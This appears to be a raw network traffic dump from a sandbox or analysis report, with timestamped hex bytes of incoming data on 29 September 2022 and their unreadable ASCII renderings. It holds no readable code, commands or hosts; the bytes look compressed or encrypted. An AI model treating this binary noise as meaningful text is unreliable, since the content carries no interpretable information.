                                                                                                                                                2022-09-29 12:51:58 UTC35778INData Raw: 9a e6 6c 59 ec 2b bc 54 db 9b 2b ff 33 68 24 20 bd 8a e2 51 c2 d5 d4 3f a8 80 32 5a c6 99 b9 70 a5 2a 27 46 39 ed dc dd 35 88 7f d7 60 d2 c0 2d f5 3f 20 26 de b5 ae a0 fb 6b 53 d7 6b cd 43 eb 5e 90 2c cb ff b2 44 20 c1 50 4c fc 65 25 e2 96 f1 e5 7a 3e 35 70 e6 25 1e 25 92 08 f4 94 02 13 0d 1a 46 2f 9a 22 c5 0a 35 94 fe ed bd 32 c8 07 9d bf 9c e2 26 23 fb ae 7e b2 39 7e a5 4e bb 03 bf 59 60 34 10 ae aa 65 d9 a3 47 5e d8 a7 2d ee 3e 8e 03 c5 21 d8 89 79 af a3 7c ba b8 ca 02 83 65 a8 54 f9 72 95 bd b5 d0 61 4a 63 c3 97 a3 28 75 9d 8f 20 81 31 c7 c5 ac d5 c9 f1 83 70 02 d3 12 48 de 93 02 ea cb bb d5 26 40 ae e4 3b 9a 7a 3a 11 a5 b4 26 cb ea 9f e4 ae 0d b5 26 38 de f1 da 38 f6 b3 f9 3a fa 95 62 2b 9e 49 92 99 68 0d 00 6b a1 f2 f2 cd 30 5a b5 d6 d3 1e 20 90 b3
                                                                                                                                                Data Ascii: lY+T+3h$ Q?2Zp*'F95`-? &kSkC^,D PLe%z>5p%%F/"52&#~9~NY`4eG^->!y|eTraJc(u 1pH&@;z:&&88:b+Ihk0Z
                                                                                                                                                2022-09-29 12:51:58 UTC35794INData Raw: 7f cd 98 2b f0 cc 07 47 f2 30 af e1 a1 c0 f0 73 e7 9f 0f 86 26 8f c5 90 dd 38 b0 8c a3 00 c8 86 3a f2 30 31 8e e4 cc 39 9f fd 1f 54 18 a3 6e 78 26 d8 7f de 4c 6e 74 76 94 66 2e 32 26 4c 36 9a 4f af 11 06 e8 cd a2 95 40 5a 5f 24 6d 95 a9 96 20 9a e4 43 a9 eb 03 9d 48 53 4c fb 70 26 9a e0 6d bf b5 fd 14 46 8d b8 6e a3 81 42 58 6e e9 cc e6 19 f1 14 28 0b c9 fd d8 6e b4 63 93 af 3e 62 1b 05 55 7c fd c8 b2 2b 09 27 84 f9 dc ca f1 2c f9 9b 3c 53 ab db 1b 1c 86 ac 5f 39 19 15 fb b0 92 3c f6 0e 52 5d 1d 27 c3 0a 67 90 c2 f2 3e f0 0a 3a 38 dc ad 6e b4 77 fb db c5 42 24 9a 09 d6 0d 99 7f 2d cb dc 67 54 57 09 72 34 09 52 34 f4 25 6d a1 80 c9 ac 21 65 05 b2 d9 6a b1 8b 46 99 ec dc 61 72 eb c9 8d 67 ca 67 3e fd 6d 54 a3 31 8f 60 a6 9b 7b 04 d3 57 76 e6 4c 78 24 76 15
                                                                                                                                                Data Ascii: +G0s&8:019Tnx&Lntvf.2&L6O@Z_$m CHSLp&mFnBXn(nc>bU|+',<S_9<R]'g>:8nwB$-gTWr4R4%m!ejFargg>mT1`{WvLx$v
                                                                                                                                                2022-09-29 12:51:58 UTC35810INData Raw: 9f 90 4d a0 0a cd 0d 09 69 85 e2 f5 4f 2b f3 0b 54 03 99 96 41 7f 1f 6b ef 65 e5 59 f4 cb 73 8f 35 c1 4c fa 46 51 4d fe d0 ad d4 f5 37 96 7f 86 00 10 3d 1c 64 97 d4 9e a1 4b 87 4b fb a7 3c 59 fc 6f 03 f2 9c 5c a8 1e 61 61 cf 3e be 51 66 43 7d 90 68 78 ea 39 9a ee 0d 64 15 62 bf 5f 52 4b 32 6c 30 8e d0 41 cb ff bd db 4c 6b 73 b0 6e 34 77 dd eb 41 71 d9 25 c1 e4 c9 a1 c7 bf 43 b3 26 2f 80 d6 5b ee d2 f8 c6 53 d0 e5 7f e5 3c eb 9b 4b eb c6 18 cf 47 96 4e 60 f9 88 85 8d ba 45 dd c5 71 c8 52 b6 9b d5 0f e3 f5 18 d5 14 c9 6c d6 71 ba 77 27 4c d0 37 14 10 44 e1 95 36 db 83 16 67 c8 9b 66 15 0e c4 fa 16 bf fc c6 72 79 7a 17 77 77 20 f5 d8 b7 d6 40 85 ff b5 3f 40 11 fe ca 7c c0 08 e7 9c 1c 41 42 2f 4a a2 28 70 f1 2f 2d c2 2a e8 1f 3c b7 24 af 91 27 f3 4c 00 be 05
                                                                                                                                                Data Ascii: MiO+TAkeYs5LFQM7=dKK<Yo\aa>QfC}hx9db_RK2l0ALksn4wAq%C&/[S<KGN`EqRlqw'L7D6gfryzww @?@|AB/J(p/-*<$'L
                                                                                                                                                2022-09-29 12:51:58 UTC35826INData Raw: 17 f3 51 f9 59 1c 28 31 ef f2 8a 5e 50 09 92 e4 ad 77 09 02 e7 8e 26 bb ec 53 4a 02 cb 68 0c db fb 21 33 ec 27 42 37 dd 9a cb 2e 1a b2 4b 0d 7c 04 aa db 9f 57 77 cc 01 12 e4 80 9b 42 0a 93 ce 0c 8c d7 38 a6 dd 53 b8 21 42 f6 2b 02 b7 c7 67 cf a4 90 33 75 b5 98 f9 20 10 cc d9 28 8b 4f 0b 3f 4d a2 28 53 b3 c3 fd b2 84 69 d4 56 99 d1 d5 b9 77 75 2a cf a7 1e 18 79 ff 41 db 1a 6e 19 84 c7 7c ef 43 f8 1d 26 82 eb 9f 63 37 06 e0 68 0e 05 d4 9e 6c a6 69 5e c0 17 62 c0 bc a3 e2 53 19 ae a6 b4 18 db 4f 36 f0 96 f2 df c0 21 64 72 67 5a 0b 83 8c 59 88 02 09 5f b5 61 bd 7a a0 72 af 5b b8 16 f7 ac 35 00 8a 49 bf b1 d2 d4 91 c2 05 e1 92 2e 8a 36 3f e2 24 df 2b 5e f5 7d 35 b6 ef 80 a6 a0 4c 84 bf 2a 0c 50 49 93 a2 09 62 4b 15 e7 34 bd 54 d4 1d 83 e6 7b 66 59 2f c2 ff 86
                                                                                                                                                Data Ascii: QY(1^Pw&SJh!3'B7.K|WwB8S!B+g3u (O?M(SiVwu*yAn|C&c7hli^bSO6!drgZY_azr[5I.6?$+^}5L*PIbK4T{fY/
                                                                                                                                                2022-09-29 12:51:58 UTC35842INData Raw: 65 34 35 08 56 84 d0 f2 fa 53 ef 7e 3d ad 6f 3a 13 31 97 53 b6 9a 25 db 6b ee 8d 4e a0 2c 0e b4 9d 3c 7c 02 d7 74 c8 e0 df 15 18 c3 26 94 e3 75 78 6b 4b 39 99 1b 2e 37 75 f8 3b bd d0 77 a4 7b 47 6c de 94 96 4b ef 27 f6 bc 6d 0c dc 97 34 b8 8b a4 7a 8a 1f dc 2e 16 ad b1 15 ba 99 c3 95 b4 25 fe c6 f9 1b d0 d1 31 15 c0 93 47 4f d9 50 42 13 92 bd b2 99 15 4e b7 13 72 e5 e2 51 4d 70 5c 0c 47 9f 5d 25 ac 25 db 7c 3d b5 f3 42 ed 29 60 4c ea 30 7e d5 e3 d1 7f 31 85 b7 2d 5b a6 14 8d 9a ed 1a 0c 32 60 9b f0 97 ee 15 0a 7b 6e b2 7d 74 b9 9a 4d d0 12 6e 3b dd 35 78 8c 3b 54 f6 15 09 d6 46 d8 5d 65 ec e8 c9 83 10 12 cb ff e2 6b e7 c7 c1 bc 4c f1 c4 24 ac 5a c2 4c b6 9a 74 bc 15 5a f4 6b 49 a7 06 af 48 c6 c5 25 69 f0 38 a5 8e 80 94 4a da 8c de 5e b7 e5 45 ff 93 6f cd
                                                                                                                                                Data Ascii: e45VS~=o:1S%kN,<|t&uxkK9.7u;w{GlK'm4z.%1GOPBNrQMp\G]%%|=B)`L0~1-[2`{n}tMn;5x;TF]ekL$ZLtZkIH%i8J^Eo
                                                                                                                                                2022-09-29 12:51:58 UTC35858INData Raw: 5a 8e 4e f7 1a 4a 4a 5b ef 6e 37 46 0b 38 c9 d0 75 8c 78 c2 7a a6 f2 85 b6 a6 cd 2f 61 34 0e 49 6d 1d 93 bb 2b 85 20 90 c6 39 47 17 75 f3 05 ad fb 7e 1d 31 3b af 0b 71 a6 9d 09 73 87 be a8 fc 6e d9 41 de fd 29 74 65 c4 d1 24 be bb 6e e0 1b 5a 45 b2 da be b5 96 52 db 9a b0 b9 76 96 8f 9e 19 28 5c a9 d7 55 da 82 6d 53 36 8d 8c 63 85 32 9f 83 4a 81 6a a4 ae 2b aa 00 0e fe 4a 9f 09 13 d0 e3 47 fc 5d db 3d 20 57 a3 c1 30 34 e9 2d c2 aa 1f b1 a2 2b 89 0a 66 4f c2 89 7f 30 39 3c 92 6a 7d e6 18 94 ff 8d c1 bd ff 71 83 c7 81 76 c8 80 65 64 40 2f 01 64 18 b6 8c e6 39 2e d9 ec b3 59 f8 71 fe 51 7e 7a 38 48 d8 af eb cc 97 af 8d 18 67 3f 57 93 32 d0 7f e0 6d 3c 34 c2 aa a9 40 a6 81 dc 0f cd db 40 da df 5f 22 30 72 26 0b cb 20 a5 29 f7 4e c2 1a 78 c0 25 7f 6d 12 d5 1e
                                                                                                                                                Data Ascii: ZNJJ[n7F8uxz/a4Im+ 9Gu~1;qsnA)te$nZERv(\UmS6c2Jj+JG]= W04-+fO09<j}qved@/d9.YqQ~z8Hg?W2m<4@@_"0r& )Nx%m
                                                                                                                                                2022-09-29 12:51:58 UTC35874INData Raw: 59 82 2f db 06 7a cf d8 6a c5 7f 9a 1e 64 5a 7d 2f 07 30 2f 94 18 5a cb f4 0f 69 1f a8 89 1a fd 91 d0 9c 2a 2a 87 0d 31 5e 73 96 d2 e3 01 68 85 48 f8 36 e1 78 71 bf e6 17 d8 c0 9d de 23 53 84 17 d1 14 2b cf 0f ea 28 26 1a e8 bf 90 47 61 6d 7b 17 34 18 2d bb 0d 30 60 73 29 80 06 a7 f6 4d 9c 3c 31 fe ae a3 8d 35 6d b4 09 39 6b 05 2b 3d 44 cb c2 78 a4 65 fc e6 74 42 e8 fe 30 3b 36 9c 6e 46 58 ce 1f 60 49 1d 6d 11 21 cf 8b 8f 27 30 a8 e5 67 4a 6e af c1 53 28 bd 32 59 e0 c2 f1 76 7a 6e 0d 68 4e f6 e6 a2 28 98 03 c9 8d e7 dd f9 52 e5 6b d7 48 72 a8 5a d7 6f e6 d9 6f 94 b3 b8 e0 73 96 0a 3f c3 31 0d 5c d1 38 ec 8e 01 1f 72 70 53 e1 64 dd 1d c8 28 ce 5c 15 8b 8b de 9f 1b 8d 26 94 f8 7e be 0a 08 55 bf 7a 2e ad 5f cb 32 2b 01 24 05 0c 9f 34 98 03 4d ba 38 87 2c 08
                                                                                                                                                Data Ascii: Y/zjdZ}/0/Zi**1^shH6xq#S+(&Gam{4-0`s)M<15m9k+=DxetB0;6nFX`Im!'0gJnS(2YvznhN(RkHrZoos?1\8rpSd(\&~Uz._2+$4M8,
                                                                                                                                                2022-09-29 12:51:58 UTC35890INData Raw: 3a de 2a 53 fa e9 12 6f be 69 09 f4 04 3c e9 af 45 08 0b f2 99 ae b3 be 93 07 1d ce d1 82 74 7b 96 b8 4b 7c aa 15 27 54 54 96 db 74 0e 80 f2 73 16 b2 01 94 f9 0a 31 bc b8 2c f4 a7 9c 0c 68 15 0d 73 38 70 b2 69 b4 eb 15 a0 fd 64 80 eb c7 fd bc d8 74 81 56 7b ee f1 a5 19 78 db a6 3f b9 b9 3f 3f 89 7f 39 c4 9b 92 e9 13 41 92 89 34 32 76 61 c0 c0 b2 4e f2 69 1a a0 c8 90 7d 31 f2 f6 0f ec 26 33 1a 78 e0 49 d5 ff bc d2 4e 7b 52 12 e9 9d bd bc ff 8e ec 8c 4f 71 4a 68 e5 e9 cb a9 e5 6b bb 7f 38 26 15 fb 88 5f b0 b8 e0 bb 99 fd f3 b0 f0 1f 1e 7c bd bc ac 6e b0 22 74 d3 c1 fb 6b 8c a0 94 ec 21 b9 57 40 e9 80 01 5f 27 e9 8d fe 48 3b 89 25 58 73 da 5a d3 9e c7 ab e9 8f 3d 0b dd 0f 69 35 61 d5 5d 22 d8 3e ea e1 ef 86 17 e9 79 28 9f 9d 81 b4 86 c9 8c 3b 97 fb 75 71 95
                                                                                                                                                Data Ascii: :*Soi<Et{K|'TTts1,hs8pidtV{x???9A42vaNi}1&3xIN{ROqJhk8&_|n"tk!W@_'H;%XsZ=i5a]">y(;uq
                                                                                                                                                2022-09-29 12:51:58 UTC35906INData Raw: 0d 9a 0b 5e 71 02 c7 4b a8 4e c8 5c d8 5f 62 17 c8 88 a8 92 77 1a 5e 90 ce d9 90 61 2e 9a d9 1b 4e 18 1a c6 14 79 27 f6 ba 2d 2a 14 cc 0e 56 b8 13 23 45 f6 07 56 e6 39 12 3e 4f 96 0f 86 47 e4 15 83 f9 1b bc 3e 2e 7c ba e1 e2 04 31 52 1d f7 59 dc 29 84 a4 2e 0e 7c 2a 7d d8 61 b3 53 a5 18 f9 6c 0c 5b 7a d5 7d 1c ff 70 67 18 33 0c 9a 8e 76 ad eb c3 f2 a1 b5 b3 97 8a a4 6e ae ac 5d 12 da e5 9d ac 8a 43 db 96 a4 09 dc 29 bc 6a e0 10 54 df 7d da 9f 5c 53 a7 9a 49 dc 83 28 6c c3 d8 4e f7 50 bd 20 f8 9a 87 07 b4 8b f7 d5 9a f9 bb 29 de e2 4b 2d b9 0f a6 f6 81 23 56 07 bb f0 28 82 52 37 9a ad 25 72 5a 03 7a d6 5d 7c be 77 2f d6 cf 6a 8e b1 6c 7c 72 6e 2f f4 6d 10 21 ff 4b b9 e1 bb 54 b4 83 52 2a d7 44 54 09 ef ef 19 e8 ef e1 c3 3a 75 4f 0d c7 34 7b fa 21 62 31 3c
                                                                                                                                                Data Ascii: ^qKN\_bw^a.Ny'-*V#EV9>OG>.|1RY).|*}aSl[z}pg3vn]C)jT}\SI(lNP )K-#V(R7%rZz]|w/jl|rn/m!KTR*DT:uO4{!b1<
                                                                                                                                                2022-09-29 12:51:58 UTC35916INData Raw: fc c5 1f 20 89 a1 61 06 e8 c5 92 2f 19 85 f9 fa 0a dd e9 88 17 c7 be c1 f3 c1 96 60 38 24 3c 9a 45 06 3d ce 96 02 e8 7c 24 f4 60 f0 03 84 2d a8 48 0a 0b 53 f6 64 d4 73 9f 7b fc 76 de 78 c7 e8 b6 06 8e e9 54 7b 1d fe c2 89 c8 8f 19 a3 a8 26 08 94 28 ba 4f ba 97 35 58 50 36 a4 ff d8 63 60 fe 4e 8d 20 ec 73 f2 8a 9f 27 f5 e3 5f 14 c3 60 b7 6f f1 77 dd 8a 02 11 a4 0f d1 d1 c0 b6 41 a2 3e a5 18 0b 4c 51 2a 0c 0c 9a 94 78 a9 c0 0e 5c c8 1a da f3 5a bc 07 56 e4 98 8b f7 b1 57 85 c1 b1 fb 39 11 b5 12 1a be 82 d1 6b bc bc 6a 95 3a f9 4a bb e8 3a a2 16 af 58 e3 46 a6 6a 78 54 29 d0 27 62 7d 37 23 ae 8f 23 03 96 a0 c5 cf 88 89 45 2d bc 62 21 da 4a c0 92 34 df 8f 31 3e 9d 32 31 92 e2 b2 f4 0a 0f 15 26 9e 0c d1 ad 1b 15 07 20 78 32 9a 9b dc dc 16 ce 52 47 7a 3a 2e cc
                                                                                                                                                Data Ascii: a/`8$<E=|$`-HSds{vxT{&(O5XP6c`N s'_`owA>LQ*x\ZVW9kj:J:XFjxT)'b}7##E-b!J41>21& x2RGz:.
                                                                                                                                                2022-09-29 12:51:58 UTC35932INData Raw: 26 c8 19 e6 5f c9 7a c7 12 ff 37 3c ea 5b 60 b0 b2 54 f0 3e 5e 82 f3 e2 ed 32 e5 25 27 65 e2 e4 cf 03 f5 b2 a1 87 31 c7 f6 4d 93 a2 41 bf 81 10 9d 41 fd 7b 8f d3 f5 82 b9 12 09 d7 fe d6 17 20 5f b5 a9 94 eb cd 0c d6 57 59 99 85 3c 16 b3 60 3a c3 ea 21 3c 83 e9 f0 06 ed a9 99 e6 d1 6e fe 95 bc b1 af a6 c9 06 85 4a 40 b4 e6 8b 09 fe c4 20 df 37 60 bc ab 3b 9e 63 8e 75 ed 8b 3b fb eb ec 20 8f 40 4c 63 ca 00 60 fd 1b 13 14 3e aa 0b e9 9e b1 ff 11 36 d4 da bc 16 4f 92 43 de f4 4e bd ac ac 51 3d 86 c0 6e 5d 88 92 18 a2 0a ff 97 04 48 3f c4 ad e4 60 a5 a5 b9 39 9d 3b 25 ad 01 75 60 d5 08 84 2f f0 45 27 dd 0e d4 90 b7 e3 80 b6 fe 9b 10 68 3c 7d 81 07 bb 4e 9d ae 0d 34 e7 7d a3 7b 89 2f 9e 86 e1 47 e2 92 55 10 b5 52 c4 71 18 c0 4e 56 07 9f 40 17 a5 8f a7 31 9c 40
                                                                                                                                                Data Ascii: &_z7<[`T>^2%'e1MAA{ _WY<`:!<nJ@ 7`;cu; @Lc`>6OCNQ=n]H?`9;%u`/E'h<}N4}{/GURqNV@1@
                                                                                                                                                2022-09-29 12:51:58 UTC35948INData Raw: 8f 1b 29 fc 08 9e 44 d3 df 2d 76 d0 79 8d d0 d2 91 43 48 5e 64 51 c0 67 68 7a e0 96 8f 54 9e e6 04 f3 27 50 f7 df 92 35 3b 4f 09 01 f1 04 a9 83 9d 6e 7e ec 8d 79 85 71 c3 a5 3d b9 13 f1 a5 91 32 14 d2 d3 16 ac ad ab 25 49 cf 52 6a 15 00 cf c4 2f e4 97 48 ce 32 6b 72 12 d1 c1 10 dd 64 f6 5a 3c 01 82 10 62 b5 ef 96 4e 04 da 7f e1 1f 4c 20 1b c7 7c f8 76 87 86 18 e6 10 67 06 1b 1f d8 d0 13 3a 37 07 60 73 a3 74 bf cf 4a 9a a3 ab 19 5b 8c 19 c4 78 d6 8a 44 ae 67 a0 eb 0f 6e ef 7a 85 26 3f 82 a3 cc 7a be c2 e1 91 25 8a 77 21 cf bc ba 3d 0d 90 52 ee 4a bc e6 64 ff 0c 2a 28 29 5b 41 ed 20 69 9a ee 9e eb 8c 72 d8 7b 2b e8 c8 d9 71 31 a2 a8 a8 12 74 fe 88 71 4f 12 ee 20 07 a2 2c ad 7f ad aa 88 7e 6e d4 b6 9c 32 1a c8 4e 1c 03 5d fc d8 1c 48 7d 5d 32 20 44 87 58 0f
                                                                                                                                                Data Ascii: )D-vyCH^dQghzT'P5;On~yq=2%IRj/H2krdZ<bNL |vg:7`stJ[xDgnz&?z%w!=RJd*()[A ir{+q1tqO ,~n2N]H}]2 DX
                                                                                                                                                2022-09-29 12:51:58 UTC35964INData Raw: 43 60 22 07 2f 0e ad 54 ce 2c 5f 87 0e c0 6b 4e 05 64 9e d2 69 00 58 47 7b 4a 0d 66 53 5c 06 fc 16 4c a2 25 9c 76 f1 4f 80 4f b1 66 a0 57 98 79 f6 8e 16 5b 10 b6 8f d0 71 d3 8c 82 ac 79 31 6b 2d d8 46 41 17 a1 d4 b9 d3 87 51 5a aa ba 59 13 b5 84 b1 26 dd 33 37 de ce 43 72 35 0e 80 c3 18 3a 28 83 8f 5f f3 f0 7a 4a 26 47 d0 65 c9 55 5b 94 9e 9e ee 95 be f3 82 33 07 58 42 2f ec ad cd e1 08 90 27 b9 e3 82 7d 74 15 c3 4e d2 c9 2f 28 51 e8 bf 54 05 e6 0e 0f 34 5f d2 4e 8b b6 4b 58 62 0d 0e cd 02 c1 fb da c8 ff 35 05 58 27 46 7e bd 57 5d bd bf 40 ca e3 46 a5 1b 93 53 c5 52 fe 41 c0 53 54 3a 98 11 95 c2 20 2d cf b9 16 e5 99 a2 ae 2f bf b0 d7 e4 6b 04 69 66 04 9a 12 68 14 ed 80 7f 40 47 de 77 46 10 51 e5 33 e7 cb ff 5f e3 b7 9b 6a 5c 29 11 a8 e6 3c e2 52 a8 85 08
                                                                                                                                                Data Ascii: C`"/T,_kNdiXG{JfS\L%vOOfWy[qy1k-FAQZY&37Cr5:(_zJ&GeU[3XB/'}tN/(QT4_NKXb5X'F~W]@FSRAST: -/kifh@GwFQ3_j\)<R
                                                                                                                                                2022-09-29 12:51:58 UTC35980INData Raw: b1 10 dd aa fe 4f 23 70 b3 7c 9c 12 6e bb 52 e7 02 b2 fe ed 98 5b 16 fd e5 3b 81 f0 a8 28 15 87 3f a7 c8 6b 8b 0b c5 29 02 c3 70 38 f6 be 8a 93 0d 2c 64 dc 66 6a e8 ee 37 d0 5d 3c 29 5f 44 ef e9 4f 73 d1 ca cc 13 d4 bd 42 56 5d 9d c7 3d 6e 8e 65 2f ad 97 79 7e 2a 02 e1 50 a1 8d e8 0e 1f 25 8f e9 0b a0 d4 c0 4f 99 fc e5 47 6e af ff 82 55 20 b8 cb 64 2e 95 15 f6 07 09 a8 5d 20 53 34 c3 0a 30 c9 8b 98 f2 58 75 fb c4 2f 71 0c b3 18 68 2f dc a1 5c b6 ad 0d 64 06 06 08 9e a1 f8 68 38 fd 5c e9 73 24 92 04 71 65 0c 7c e5 59 1a 5b 84 21 f2 02 13 ca 3a fa fc 51 c2 83 c3 2a 51 e4 a9 0f 64 d0 d4 70 bd d8 eb 18 92 f7 87 77 08 75 47 ad bf c2 ae 13 7f 7f 3c 38 68 d4 06 82 f4 5f 3a 4f 7a 9d 2a 9a 85 90 02 c5 b1 65 24 4a c5 a2 b0 20 d8 01 4d a2 92 d4 7d 0e df cd 44 6a 57
                                                                                                                                                Data Ascii: O#p|nR[;(?k)p8,dfj7]<)_DOsBV]=ne/y~*P%OGnU d.] S40Xu/qh/\dh8\s$qe|Y[!:Q*QdpwuG<8h_:Oz*e$J M}DjW
                                                                                                                                                2022-09-29 12:51:58 UTC35996INData Raw: e8 8c 13 d6 f8 9b eb 85 0f c4 e0 e8 1c d7 c1 01 84 c4 d1 bf 9a 44 11 a9 19 f4 f4 04 86 ef 1e d2 7e 04 64 8a ea 60 83 14 9b fa fe f7 e8 58 39 fb a3 01 39 c5 f1 47 8c 6e 45 8e df 3e 78 fe c1 00 e5 4f 44 9f d7 dd 65 f4 99 49 20 ad a3 16 dc f3 c9 64 a7 16 b2 09 f3 7a bf 54 d2 60 a2 84 05 b5 6d 0a de fb 58 44 1a fc 2b e9 79 8c ee 62 52 ee c1 74 ed cc 84 1c 0b 3a 12 04 5e 87 fc 0c 70 99 0c c8 a6 94 73 5a 21 80 eb 01 a8 00 3f 4f de b2 26 81 39 fd 0d 5b 6f a9 11 e2 cf 75 cc 67 70 b7 50 4a 8f b7 5a c4 14 2d 70 83 27 f1 ac 26 80 f2 84 c2 77 1a a5 19 6a 08 d7 a4 4d 12 01 86 66 ac 65 9e 15 c3 64 45 69 82 84 03 dc 5f 0e d5 aa e6 67 ff e5 17 ad 8e 58 be 31 0d ef f7 e6 c6 ab c3 26 c0 b1 b1 22 16 c2 8d 86 27 e1 1b e2 b4 55 d8 83 1a 9f 41 19 7f ba ca c5 7b 27 74 b8 12 80
                                                                                                                                                Data Ascii: D~d`X99GnE>xODeI dzT`mXD+ybRt:^psZ!?O&9[ougpPJZ-p'&wjMfedEi_gX1&"'UA{'t
                                                                                                                                                2022-09-29 12:51:58 UTC36012INData Raw: 1e 94 ea 1f 08 7d d8 b7 7d 1c 69 07 38 6a 16 de 5e 4b f4 56 a7 2a 7b 4b 01 5d e5 fb 9b e2 e8 9c 57 cd ef e6 54 a1 01 04 e8 67 0b 36 6a 84 e2 06 49 fa ea 76 3b 52 de fa 64 36 7a c3 26 5d d4 a7 9f 31 eb 9e 15 af 72 9f 48 f8 2b b9 77 5d a4 e6 28 06 1c 64 b1 ed 4d 3e 76 94 e4 65 57 bd d3 8f 7d 88 a7 a4 e1 22 c8 e7 e3 f7 ae bb df a3 cd 4f 5e 99 70 ce f6 73 ce 19 d2 8f 03 ca f5 9b ec 43 bd 73 34 0c a0 e0 aa e7 b6 e0 93 15 4d b3 ba 64 97 c0 fd 47 4d f1 4f 1f 90 c9 cf b0 4b 39 a7 7b 93 d2 02 59 bd c2 6c 0b 5c cd 82 fe eb 99 2e 1e d6 17 40 bb 80 7b 6c c3 54 88 44 3f 04 b4 0a 61 41 94 b0 a0 05 d5 02 2d 61 18 a3 b7 45 17 b0 d3 73 eb c4 e0 3d 24 7a d4 1a f9 69 92 04 b6 49 d8 71 89 83 f0 8f 81 5f 52 d7 da 01 c6 66 0e 72 aa dd 0b 59 8d bb ed 09 03 d7 3b 65 7a fa b2 6a
                                                                                                                                                Data Ascii: }}i8j^KV*{K]WTg6jIv;Rd6z&]1rH+w](dM>veW}"O^psCs4MdGMOK9{Yl\.@{lTD?aA-aEs=$ziIq_RfrY;ezj
                                                                                                                                                2022-09-29 12:51:58 UTC36028INData Raw: 27 0c 09 5a 4b dc dc ac a7 bc 4d 20 b1 9e 74 2d d6 34 f9 f9 1c 7f 92 7d a4 b7 57 cf 6d b5 74 5a 15 84 59 08 4f d7 08 9d b8 87 7c cc ce e0 2d 5f 40 16 91 73 31 63 39 e5 93 56 1f 74 e5 e7 80 21 e0 c5 21 1c 88 77 11 96 37 47 8c f5 1a 3a 07 93 64 60 a0 27 e5 2e 74 de 67 15 36 d3 58 44 a0 ce 0c 4b 2c 93 83 8f c3 f0 c0 71 73 62 ef 76 73 d6 97 8b 02 40 4a 8c cf b9 d3 a8 ad 16 a3 6f df f3 3e 10 38 65 8a c6 07 db 81 90 4d 70 17 67 55 1f 60 d7 3c 48 65 ca 7c d4 e9 e5 19 53 df 4b 80 01 8f 29 7f 31 1b c5 07 ee 07 9e d7 ef d4 b2 33 34 4f 2a 0d 97 7b 3f a4 95 63 72 2c 87 a7 47 4e e8 39 5c 8e b2 9c f6 d3 80 af 3d 86 0a 6a dc 17 12 b2 97 00 6e b1 32 74 98 cc 13 0f 0b 83 51 6b eb c3 b3 42 28 e4 0d db 4a 75 62 49 b3 f1 9f b2 69 ce e4 89 ca b9 cb 29 d6 34 a3 a9 81 0a 2c a0
                                                                                                                                                Data Ascii: 'ZKM t-4}WmtZYO|-_@s1c9Vt!!w7G:d`'.tg6XDK,qsbvs@Jo>8eMpgU`<He|SK)134O*{?cr,GN9\=jn2tQkB(JubIi)4,
                                                                                                                                                2022-09-29 12:51:58 UTC36044INData Raw: 84 e2 af 92 2e aa 5d 36 40 df 18 7e 20 a4 24 ae 3f e8 23 74 36 79 0c 80 3d 68 b5 ea 00 6a a3 fd 3f c9 cf b8 99 29 a9 ce 7c 0f 4d 23 1f 2e 93 89 cb 76 04 b4 2b fc e9 e1 05 73 3f 98 8e 8a 6a 37 18 f1 37 86 56 0f 15 15 53 23 be 71 a8 92 34 29 da 55 37 9e 1c 89 44 a8 22 eb e2 b0 0c b1 70 69 5b 48 ec 44 4a 69 9a 30 75 dc be 0a 09 ee 33 73 c9 e8 dc 2d 45 ae df 8b 6b f7 17 4a ec 9a a6 83 1d ef a3 b3 85 8c f5 97 d1 49 0c 15 ff 12 65 48 32 bd 6e 34 76 6d 1e 80 1c f5 73 26 3f f6 5c b8 ad 37 45 84 9d 91 fc fe fc 28 6d 1a 02 0a 74 f6 31 96 e9 f7 51 24 cf b0 5a 54 94 3b aa f9 94 e2 80 0c 20 91 45 68 d0 96 bb 06 0c 86 16 c0 69 16 99 e4 6a 50 3e ca da ec 93 58 c8 12 28 43 f0 f5 34 77 3f 90 e4 27 11 4c 8a 8c b4 7c bc fe c8 02 5b 31 97 6c c8 e7 74 17 b7 e8 91 a0 1a 9d 27
                                                                                                                                                Data Ascii: .]6@~ $?#t6y=hj?)|M#.v+s?j77VS#q4)U7D"pi[HDJi0u3s-EkJIeH2n4vms&?\7E(mt1Q$ZT; EhijP>X(C4w?'L|[1lt'
                                                                                                                                                2022-09-29 12:51:58 UTC36060INData Raw: d1 8f 88 e1 36 45 96 98 78 a3 1b 23 2f eb 86 b6 07 a9 71 5f f8 73 63 3b 4a 71 84 d0 73 48 b7 0e 84 30 97 61 51 0f fd 71 b9 ac e8 23 ae 08 80 d3 7c 29 14 d5 be 2e fc de 32 36 be 48 e5 40 ee 71 bf 02 a1 ef 9b 64 c8 01 3a f5 c2 03 23 76 f5 0a b8 5b e8 ee 7b e1 b9 80 b6 a2 8b 7f b5 2a 0d 0b 97 96 75 dc c8 c9 c7 ae 41 0b a1 6a 39 c3 fb 76 32 6b 15 96 a8 c8 9e 60 80 c3 2e 95 1b 15 ce d2 59 5e 30 a6 66 33 f6 f0 e4 e1 b9 68 3b cd 74 11 a7 5c 07 50 6e 37 81 2d 66 23 e2 a6 f1 fb c3 f0 38 1c 4c de 2a 8a cf 82 7c 85 b9 f4 4c cd 3b ac 71 bb 84 a1 96 3f f9 76 7c 54 c6 1e 94 ad d5 94 c8 5c 84 95 59 76 a2 90 e4 55 88 7e 63 d7 18 3f 59 bd 82 47 ba b0 17 af cf e1 5d eb cc d0 85 90 e2 8f 35 2c ee 66 9c b0 88 2a 82 52 c8 a1 bc a4 5b 23 53 6b 06 7c 42 f8 c7 c9 75 b4 9e b5 32
                                                                                                                                                Data Ascii: 6Ex#/q_sc;JqsH0aQq#|).26H@qd:#v[{*uAj9v2k`.Y^0f3h;t\Pn7-f#8L*|L;q?v|T\YvU~c?YG]5,f*R[#Sk|Bu2
